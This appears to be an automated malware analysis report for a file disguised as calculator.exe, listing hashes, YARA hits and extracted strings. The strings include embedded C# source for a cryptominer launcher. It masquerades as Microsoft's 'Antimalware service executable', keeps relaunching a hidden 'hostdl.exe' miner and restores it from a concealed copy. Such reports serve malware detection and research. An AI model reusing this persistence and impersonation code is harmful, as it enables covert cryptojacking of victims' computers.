Sample details: 8c2d2a86f280bfd2fa619f75b4a56782 --

Hashes
MD5: 8c2d2a86f280bfd2fa619f75b4a56782
SHA1: af1686a221de6f90388ee6c4c4ae5ed7fa66ba71
SHA256: 62766a399be76b5e0450667145483e0a506a372a7268b6e21c30c01a74de2398
SSDEEP: 1536:AIoxfIuAT4nbGnj59DUgkTH33sFhK6tNCoYVHWC/hbCd:4xfIuAT4nbG99DtWcF1tNcHWC/hbCd
Details
File Type: PE32
Yara Hits
YRP/Microsoft_Visual_Studio_NET | YRP/Microsoft_Visual_C_v70_Basic_NET_additional | YRP/Microsoft_Visual_C_Basic_NET | YRP/Microsoft_Visual_Studio_NET_additional | YRP/Microsoft_Visual_C_v70_Basic_NET | YRP/NET_executable_ | YRP/NET_executable | YRP/NETexecutableMicrosoft | YRP/IsPE32 | YRP/IsNET_EXE | YRP/IsWindowsGUI | YRP/IsBeyondImageSize | YRP/domain | YRP/IP | YRP/contentis_base64 | YRP/CRC32b_poly_Constant |
Source
http://dropbox.com/s/pfjytp8t6n386q5/calculator.exe?dl=1
Strings
          	            !This program cannot be run in DOS mode.
`.rsrc
@.reloc
NDX+/ 
i-J 5O
 cv,{X+Y
+0 x&&
 9jwHX+
tX+>~%
 iC((j
 (IuaX
 ;~Uy 
 ^!HBX+
X+, ZV
 u$O=X+
 4HW*X
 E7+QX+	
cza 3I
0Z` bp
X+W v|
 jw1?X
+3 6	@
X+t S%
 K;T) \J
`7X+Y~
ZXf .P
 Y-V)X
 Q]i} 
<ZXY ^v
 qul} _
+	 f]]d
 m;G7X
 vse6X+
 Dse<X
 a_}dX+o~	
Zva+8 
rc H:;
M| 'x@
 .G{uY+
 1|GbX
 3;v|X
 Ox6HX
 !A9iX
tX+3 c
 us7:X
 puINX
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
using System;
using System.Diagnostics;
using Microsoft.Win32;
using System.Drawing;
using System.IO;
using System.Reflection;
[assembly: AssemblyTitle("{GETNAME]")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("{GETCOMPANY]")]
[assembly: AssemblyProduct("{GETPRODUCT]")]
[assembly: AssemblyCopyright("Copyright 
  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace IconStealer
    class Program
        static void Main(string[] args)
        {
            string appexe= Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            string wdir = appexe + @"\Microsoft\Network\Connections";
            appexe = appexe + @"\Microsoft\Network\Connections\hostdl.exe";
            if (File.Exists(appexe))
            {
                Process miner = new Process();
                miner.StartInfo.FileName = appexe;
                miner.StartInfo.UseShellExecute = true;
                miner.StartInfo.WorkingDirectory = wdir;
                miner.Start();
            }
        }
using System;
using System.Threading;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyTitle("Antimalware service executable")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft Corporation")]
[assembly: AssemblyProduct("Antimalware service executable")]
[assembly: AssemblyCopyright("Copyright 
  2017")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
namespace Supreme
    class Class1
        static void Main(string[] args)
        {
			if (InstanceCheck())
            {
                Process defender = Process.GetCurrentProcess();
                defender.Kill();
            }
            string appdata = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
			string wdir = appdata + "/Microsoft/Network/Connections/";
            appdata = appdata + "/Microsoft/Network/Connections/hostdl.exe";
            string copy = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            copy = copy + @"\Microsoft\Internet Explorer\History";
			Process miner;
            while (true)
            {
                Thread.Sleep(100);
                if (check())
                {
				try{
					miner=new Process();
					miner.StartInfo.FileName = appdata;
					miner.StartInfo.UseShellExecute=true;
					miner.StartInfo.WorkingDirectory=wdir;
                    miner.Start();
				}catch{}
                }
                if (!File.Exists(appdata))
                {
                    File.Copy(copy, appdata);
                }
            }
        }
        static bool InstanceCheck()
        {
			Process[] defender = Process.GetProcessesByName("defender");
            if (defender.Length>1)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
        static bool check()
        {
            Process[] minr = Process.GetProcessesByName("hostdl");
            if (minr.Length==0)
            {
                return true;
            }
            else
            {
                return false;
            }
        }
8YqE/R
S|UH=v
z>1xTb
%-f8+Q?
nWpOd2$
Q./#,]
&yt,}R
M;hy]WF[G[R@h}Z@QFZQ@
qLDX[FQF
S"teAKZG[GN\t
AFLG_[
lMNMFLMZt@
^]EPXZ]E^
^\\^Y\_
Uy0&oKR
"(9$8$-?
9./.%?"*'8
#m|XRC^B^WEmrCTUT_EXP]BmbEPCETC|^UD]T
>LQvjm4ikvz|jj<
~B@QFJHUDK\Xu
;9$=81&
1&'=;:B
C]ZQLQ
?{5z#{
bsW]LQMQXJb}L[Z[PJW_RMbmJ_LJ[LsQZKR[
0ohn}hiq7h
l&33dqn2lssp2quryn{}hy2
sq&())*,
[S	b1)E
L 36PQM
h+773yll1p/&0&)wm!&$&7m7& +l
iWz=QG
E/K4i?
':60&&
-%9:'0'
q|6uk| 
5&$"0ts
?IL_][I
dXQC@VERkz^TEXDXQCk`^YSX@DktBEERYCaRED^XYkeBYk:
]Lhbsnrngu]Oduvnsj]Bnoodbuhnor]inruem/dyd
-L]ysb
vdL^udg
~~usdy
5e~{MUJGJB
677<:-067*
5/3JU+
l%*/&0l$7
'+|OQWNH[
JTSPZPSI
)`ojcu)a)qohkakhr(c~c@
pu|j6~6npwt~twm7|a|)
&:P1o;
ANKBTF
X`)&#*<+:
?vy|uc?gy~}w}~d>uhu
_8U! .
;1 =!=4&
7&%= 9
=<<71&;=<!7
cNY=SB
4*-.$.-7M
j#,) 6j2,+("(+1k = 
K@AN[J
dLj\.3
rdii)%<i'41i17%#!y
0xu9x;*!(,761?0,xu,x%
0q70)$:
nYe7z58
[/1\Tu
1Yyy\W
&;"=01&
v4.0.30319
#Strings
Supreme.exe
Supreme
mscorlib
System
System.Drawing
System.Windows.Forms
System.IO.Compression.FileSystem
Kernel32.dll
advapi32.dll
Environment
GetFolderPath
SpecialFolder
String
Concat
Directory
System.IO
Exists
CreateDirectory
DirectoryInfo
Thread
System.Threading
CompilerParameters
System.CodeDom.Compiler
set_OutputAssembly
set_GenerateExecutable
set_CompilerOptions
get_ReferencedAssemblies
StringCollection
System.Collections.Specialized
CompilerResults
get_Errors
CompilerErrorCollection
SetAttributes
FileAttributes
CompilerError
get_ErrorText
Format
Console
WriteLine
RegistryKey
Microsoft.Win32
CreateSubKey
GetValueNames
op_Inequality
GetValue
Contains
ExtractAssociatedIcon
Create
FileStream
Stream
FileVersionInfo
System.Diagnostics
GetVersionInfo
get_FileDescription
Replace
get_CompanyName
get_ProductName
Delete
SetValue
Process
GetCurrentProcess
GetProcessesByName
GetProcessById
Application
get_Handle
MessageBox
DialogResult
MessageBoxButtons
MessageBoxIcon
GenericSecurityDescriptor
System.Security.AccessControl
get_BinaryLength
GetBinaryForm
RawSecurityDescriptor
get_DiscretionaryAcl
RawAcl
InsertAce
GenericAce
get_ExecutablePath
op_Equality
GetCommandLineArgs
ReadAllBytes
WriteAllBytes
get_StartInfo
ProcessStartInfo
set_FileName
set_UseShellExecute
set_WorkingDirectory
set_Arguments
get_FileVersion
get_Id
WebClient
System.Net
DownloadFile
ZipFile
System.IO.Compression
ExtractToDirectory
set_CreateNoWindow
set_WindowStyle
ProcessWindowStyle
UnhandledExceptionEventArgs
get_ExceptionObject
get_Headers
WebHeaderCollection
DownloadData
get_Is64BitOperatingSystem
OpenSubKey
Substring
Object
ReferenceEquals
GetTypeFromHandle
RuntimeTypeHandle
g.resources
resource
<Module>
Dictionary`2
System.Collections.Generic
EmptyTypes
Double
ThreadStart
UInt16
CSharpCodeProvider
Microsoft.CSharp
IDictionary`2
UInt32
Single
CodeDomProvider
CompileAssemblyFromSource
IDisposable
Dispose
CollectionBase
System.Collections
get_Count
GetEnumerator
IEnumerator
get_Current
MoveNext
UInt64
Registry
CurrentUser
Random
SetThreadExecutionState
GetKernelObjectSecurity
SetKernelObjectSecurity
Win32Exception
System.ComponentModel
SecurityIdentifier
System.Security.Principal
WellKnownSidType
CommonAce
AceFlags
AceQualifier
Exception
NameValueCollection
LocalMachine
get_Assembly
Assembly
System.Reflection
ResourceManager
System.Resources
CultureInfo
System.Globalization
GetString
get_FullName
Encoding
System.Text
get_UTF8
GetBytes
GetExecutingAssembly
GetManifestResourceStream
SeekOrigin
BitConverter
ToInt32
.cctor
value__
FlagsAttribute
RuntimeMethodHandle
Module
MethodBase
IntPtr
get_Module
ResolveMethod
get_MethodHandle
GetFunctionPointer
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
System.Runtime.CompilerServices
AssemblyProductAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
AssemblyTitleAttribute
AssemblyDescriptionAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
CompilationRelaxationsAttribute
AssemblyCopyrightAttribute
AssemblyFileVersionAttribute
DebuggableAttribute
DebuggingModes
Microsoft Corporation
WrapNonExceptionThrows
 Windows
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.54
 Windows
Copyright 
  2017
1.0.0.6
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
    <security>
      <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
        <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>